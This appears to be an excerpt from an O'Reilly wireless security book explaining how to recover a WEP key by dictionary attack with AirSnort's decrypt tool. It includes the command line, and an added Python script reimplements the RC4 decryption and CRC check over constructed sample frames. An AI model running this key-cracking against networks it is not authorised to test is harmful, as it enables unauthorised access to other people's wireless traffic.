Cracking WEP with AirSnort: The Easy Way

Use a dictionary attack to test the security of your WEP key.

AirSnort is best known for recovering a WEP key passively by exploiting weak initialization vectors (IVs) in WEP's use of RC4, but that statistical attack needs a large number of captured frames before it succeeds. Less well known is that AirSnort also ships with a utility that performs a dictionary attack, which needs only a tiny sample of network traffic.

Using the aptly named decrypt utility, you can attempt to decrypt a WEP stream by trying each word in a word list as the key. The attack runs in minutes, rather than the hours needed to collect enough traffic for the statistical attack to recover the key.

To use the decrypt utility, you first need a packet dump from a utility that can capture raw 802.11 frames (such as Kismet [Hack #31]). You will also need a list of suitable candidates, namely words that are either 5 or 13 characters long (a 5-character ASCII key is 40-bit WEP, a 13-character key is 104-bit WEP). Invoke the utility like this:

# decrypt -f /usr/dict/words -m 00:02:2D:27:D9:22 -e encrypted.dump -d out.dump
Found key: Hex - 61:6c:6f:68:61, ASCII - "aloha"

Notice that you also need to specify, with -m, the BSSID of the network you want to decrypt; the decrypted frames are written to the file given with -d. In this case the BSSID is the same as the MAC address of the AP, which is the usual configuration, but an AP can be set to advertise virtually any BSSID, so do not assume the two match. You can read the BSSID from the Info pane inside Kismet while capturing the data.
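To show what decrypt does for each word in the list, here is an added example in Python; it is not code from Wireless Hacks or from AirSnort. It reimplements the per-candidate check (build the per-packet RC4 key as IV || candidate, decrypt the body, verify the CRC-32 ICV) and runs it over a constructed word list and two constructed WEP frame bodies encrypted under "aloha". The real decrypt works on a raw 802.11 capture filtered by the BSSID given with -m; the example skips 802.11 header parsing and starts from the WEP body (IV, key-ID byte, ciphertext, ICV). All function and variable names, and the sample frames and word list, are the example's own assumptions.

```python
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 (KSA + PRGA) applied to data; RC4 is symmetric, so this both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Build a WEP frame body: IV (3 bytes) || key-ID byte || RC4(IV || secret, plaintext || ICV).
    The ICV is the CRC-32 of the plaintext, carried little-endian."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + b"\x00" + rc4(iv + secret, plaintext + icv)


def wep_try_key(secret: bytes, body: bytes):
    """Decrypt one WEP body with a candidate key. Return the plaintext if the ICV
    verifies, else None. This is the check a dictionary attack performs per candidate."""
    iv, ciphertext = body[:3], body[4:]       # byte 3 is the key-ID byte, not part of the IV
    plain = rc4(iv + secret, ciphertext)
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def dictionary_attack(words, bodies):
    """Return the first candidate of WEP key length (5 or 13 bytes) whose decryption
    yields a valid ICV on every captured body, or None. Requiring several bodies to agree
    keeps the 2^-32 per-frame chance of a spurious CRC match from producing a false key."""
    for word in words:
        if len(word) not in (5, 13):          # only 40-bit and 104-bit keys are possible
            continue
        if all(wep_try_key(word, body) is not None for body in bodies):
            return word
    return None


def found_key_line(key: bytes) -> str:
    """Format a hit the way decrypt reports it."""
    return 'Found key: Hex - %s, ASCII - "%s"' % (":".join("%02x" % b for b in key), key.decode())


# Constructed sample data (not a real capture): two WEP bodies from the same BSSID,
# each with its own IV, encrypted under the 40-bit key "aloha".
SECRET = b"aloha"
PLAINTEXTS = [
    b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"ip payload one",    # LLC/SNAP header + payload
    b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"arp payload two",
]
FRAMES = [
    wep_encrypt(SECRET, b"\x01\x02\x03", PLAINTEXTS[0]),
    wep_encrypt(SECRET, b"\x0a\x0b\x0c", PLAINTEXTS[1]),
]
# Constructed stand-in for /usr/dict/words; entries of the wrong length are skipped.
WORDLIST = [b"apple", b"hi", b"wireless", b"abcdefghijklm", b"aloha", b"zebra"]

if __name__ == "__main__":
    key = dictionary_attack(WORDLIST, FRAMES)
    print(found_key_line(key) if key else "No key found")
```

Two points worth carrying over from the example: a single ICV match is only a 32-bit check, so a candidate should validate on more than one captured frame before it is reported; and a word list only finds keys that were typed in as literal ASCII, so a key derived from a passphrase by a vendor's key generator will not appear in /usr/dict/words.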

Get Wireless Hacks now with the O’Reilly learning platform.
